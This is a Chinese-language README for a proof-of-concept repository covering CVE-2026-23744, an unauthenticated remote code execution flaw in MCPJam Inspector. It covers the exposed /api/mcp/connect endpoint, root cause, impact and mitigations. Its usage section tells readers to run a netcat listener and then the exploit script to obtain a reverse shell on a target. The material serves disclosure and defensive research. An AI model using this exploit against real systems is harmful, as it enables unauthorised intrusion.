rohit-sundar/cve-2026-23744

# CVE-2026-23744 – MCPJam Inspector 未授权远程代码执行 (RCE) ## 描述 - **产品**：MCPJam Inspector - **受影响版本**：≤ 1.4.2 - **修复版本**：1.4.3 - **类型**：未授权远程代码执行 (RCE) - **攻击向量**：网络 - **需要身份验证**：否 - **需要用户交互**：否 - **CVSS v3.1**：9.8 (严重) **CVE-2026-23744** 是一个严重的**未授权远程代码执行 (RCE)**漏洞，影响 **MCPJam Inspector ≤ 1.4.2**。出现此问题的原因是 Inspector 暴露了一个管理端点 (`/api/mcp/connect`)，该端点接受用户控制的 MCP server 配置，并且可以在没有充分身份验证或安全限制的情况下触发进程执行。受影响版本默认监听 `0.0.0.0`（所有网络接口）而不是 localhost，如果该服务可从网络访问，则使得远程利用成为可能。 ## 技术细节 该漏洞与以下端点相关： ``` POST /api/mcp/connect ``` 该端点接受一个包含 server 配置的 JSON 对象，例如： ``` { "serverConfig": { "command": "", "args": [""], "env": {} }, "serverId": "" } ``` 提供的配置随后被 MCPJam Inspector 用于创建和管理新的 MCP server 进程。由于该端点缺乏足够的身份验证和安全控制，攻击者可以提交任意的进程定义，并由 Inspector 服务执行。 从根本上说，该漏洞是一个**关键功能缺少身份验证 (CWE-306)**问题，即应用程序暴露了原本为受信任的本地用户提供的功能，并在没有充分安全检查的情况下使其可以通过网络访问。 ## 根本原因 该漏洞源于两个设计缺陷： 1. **对进程管理的未授权访问** - API 允许用户定义如何启动 MCP server。 - 关键功能无需身份验证即可访问。 - 应用程序在没有任何进一步验证的情况下信任用户控制的进程参数。 2. **不安全的默认暴露** - MCPJam Inspector 默认监听 `0.0.0.0`。 - 管理 API 可以从网络上的其他系统访问。 - 攻击者可以远程直接与进程创建功能进行交互。 由此产生的攻击路径可视化如下： ``` Attacker → /api/mcp/connect → Process Creation → Operating System ``` 由于应用程序直接与操作系统的进程创建进行交互，成功利用可能会在 MCPJam Inspector 服务的安全上下文中导致任意命令执行。 ## 用法 ``` python3 exploit.py -t -lhost -lport ``` - `-t` (或) `--target`：目标 URL 或目标 IP 地址。 - `-lhost` (或) `--local-host`：用于反向 shell 连接回来的公共 IP 地址。 - `-lport` (或) `--local-port`：用于反向 shell 的端口。 ``` python3 exploit.py -t -lhost -lport -c '' ``` - `-c` (或) `--command`：要在目标上执行的命令。 在使用此程序之前，您必须首先使用 Netcat 在本地计算机上启动一个监听器。 为此，请使用以下命令： ``` nc -lvnp ``` 然后，运行上述命令以在目标上获取反向 shell。 ## 影响 成功利用此漏洞可能允许攻击者： - 在目标主机上执行任意命令， - 读取或修改敏感文件， - 安装持久化机制， - 部署额外的恶意软件或工具， - 环境内的其他系统进行跳板渗透， - 取决于服务权限，可能会实现完全的系统攻陷。 由于其基于网络的攻击向量、缺乏身份验证、无需用户交互，以及对机密性、完整性和可用性的高度影响，该漏洞被评定为 **CVSS v3.1 9.8 分 (严重)**。 ## 缓解措施 立即升级到 **MCPJam Inspector 1.4.3** 或更高版本。其他防御措施包括： - 限制对 Inspector 界面的访问， - 尽可能将服务绑定到 localhost， - 通过防火墙规则限制暴露， - 以所需的最低权限运行服务， - 监控未经授权的访问尝试。 ## 免责声明 此 PoC 仅用于教育、防御性安全研究和授权的安全测试。它只能用于具有明确许可的系统。未经授权对第三方系统使用可能违反适用的法律和法规。本仓库所有者对使用此程序造成的任何损害不承担责任。 ## 来源 1. [MITRE CVE 记录 – CVE-2026-23744](https://www.cve.org/CVERecord?id=CVE-2026-23744) 2. [NIST 国家漏洞数据库 (NVD) – CVE-2026-23744](https://nvd.nist.gov/vuln/detail/CVE-2026-23744) 3. [GitHub 安全公告 (GHSA-232v-j27c-5pp6)](https://github.com/MCPJam/inspector/security/advisories/GHSA-232v-j27c-5pp6) 4. [CVE-2026-23744 – 漏洞查询](https://db.gcve.eu/vuln/CVE-2026-23744) 5. [CVE-2026-23744：针对开发人员的 MCPJam Inspector 严重 RCE – CrowdSec](https://www.crowdsec.net/vulntracking-report/cve-2026-23744) 6. [CVE-2026-23744：MCPJam Inspector RCE 漏洞 – SentinelOne](https://www.sentinelone.com/vulnerability-database/cve-2026-23744/)

标签：API安全, JSON输出, MCP, RCE, 威胁模拟, 漏洞披露, 身份验证缺失, 逆向工具